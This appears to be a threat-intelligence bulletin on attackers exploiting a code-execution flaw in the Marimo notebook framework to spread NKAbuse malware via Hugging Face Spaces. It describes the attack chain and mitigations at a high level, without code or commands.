Intelligence
criticalSupply ChainActive

Marimo notebook vulnerability weaponised for malware distribution via Hugging Face trusted infrastructure

Attackers exploited a flaw in Marimo (a reactive Python notebook framework) to execute arbitrary code and deploy NKAbuse malware variants through Hugging Face Spaces, a platform trusted by ML researchers and developers. This represents a supply-chain attack exploiting both a software vulnerability and the trust model of a widely-used ML hosting platform.

S
Sebastion

Affected

MarimoHugging Face SpacesPython notebook users

The attack chain exploits a critical vulnerability in Marimo that permits arbitrary code execution. Marimo is a relatively recent entrant to the reactive notebook space, positioning itself as a modern alternative to Jupyter. The vulnerability allows unauthenticated code execution, likely during notebook parsing or rendering. The attacker then leveraged Hugging Face Spaces, a free hosting service popular for sharing ML models and demos, to distribute NKAbuse malware to downstream targets.

This is a sophisticated supply-chain attack because it operates at two trust boundaries. First, Marimo users trust the framework to safely render notebooks. Second, researchers and developers trust Hugging Face as a legitimate distribution channel for ML artefacts. By compromising the first layer, attackers gained access to machines where they could execute payloads. The use of Hugging Face Spaces is particularly effective because security teams and endpoint detection systems often whitelist the domain due to its legitimate use in the ML community.

NKAbuse is a known malware family with capabilities suggesting financial theft or lateral movement. The malware's presence on Hugging Face indicates the attack was likely automated or semi-automated, with attackers creating multiple public Spaces to maximise reach. This contrasts with targeted attacks and suggests broad opportunistic compromise of researcher and developer machines.

Organisations using Marimo should apply patches immediately and audit notebooks loaded from untrusted sources. ML platforms and security teams should implement additional validation of Hugging Face Spaces content, including static analysis of notebook code before execution, rate-limiting of Space creation, and monitoring for known malware signatures. This incident highlights a broader risk in the ML infrastructure ecosystem: hosting platforms are often treated as trusted sources despite limited content vetting, creating an asymmetric threat model where compromised code reaches thousands of users rapidly.

The Marimo maintainers must disclose technical details of the vulnerability once patches are widely deployed, as similar flaws likely exist in competing notebook frameworks. This attack will accelerate adoption of sandboxing for notebook environments and stricter code review processes in ML projects.